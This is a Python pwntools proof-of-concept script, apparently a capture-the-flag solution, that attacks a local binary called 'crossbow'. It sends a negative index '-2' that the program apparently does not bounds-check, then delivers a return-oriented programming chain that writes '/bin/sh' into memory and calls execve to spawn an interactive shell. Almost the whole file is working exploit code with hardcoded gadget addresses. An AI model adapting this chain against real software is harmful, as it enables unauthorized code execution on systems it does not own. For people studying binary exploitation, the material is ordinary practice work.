#!/usr/bin/python3
# Proof-of-concept runner for ./crossbow: starts the target under pwntools,
# answers its two prompts, and hands the terminal over once the chain has run.
from pwn import *

context.binary = target = ELF("./crossbow", checksec=False)
r = process()


def send_at_colon(data):
    # Reply to the prompt that ends in ": " (the first question asked).
    r.sendlineafter(b": ", data)


def send_at_arrow(data):
    # Reply to the prompt that ends in "> " (where the chain is sent).
    r.sendlineafter(b"> ", data)


# Gadget addresses as recovered from the binary. They are fixed, which
# presumes the target is not position independent -- confirm against the
# ELF headers; PIE/ASLR on the target would invalidate every constant below.
pop_rax = 0x401001
pop_rdi = 0x401d6c
pop_rsi = 0x40566b
pop_rdx = 0x401139
syscall = 0x4015d3
mov_rax_rdi = 0x4020f5  # by its name, stores rax at [rdi] -- verify the gadget

# Writable address the string is staged at (presumably .data/.bss -- confirm).
SH_ADDR = 0x40d500
SYS_EXECVE = 59  # x86-64 Linux syscall number

# Chain layout: 8 bytes of filler, stage "/bin/sh\0" at SH_ADDR through
# rax/rdi, then execve(SH_ADDR, 0, 0). rdi is never popped again, so it
# still holds SH_ADDR when the syscall gadget runs.
chain = [
    b"JUNK" * 2,                    # filler up to the return address (presumably)
    p64(pop_rax), b"/bin/sh\0",     # rax = the 8 string bytes (fits one register)
    p64(pop_rdi), p64(SH_ADDR),     # rdi = SH_ADDR
    p64(mov_rax_rdi),               # store rax at [rdi] (per gadget name)
    p64(pop_rax), p64(SYS_EXECVE),  # rax = execve
    p64(pop_rsi), p64(0),           # argv = NULL
    p64(pop_rdx), p64(0),           # envp = NULL
    p64(syscall),
]
buf = b"".join(chain)

# "-2" is the first answer; presumably a negative index the prompt handler
# does not bounds-check -- confirm against the binary, since a range check
# there is the fix that removes the entry point.
send_at_colon(b"-2")
send_at_arrow(buf)
r.interactive()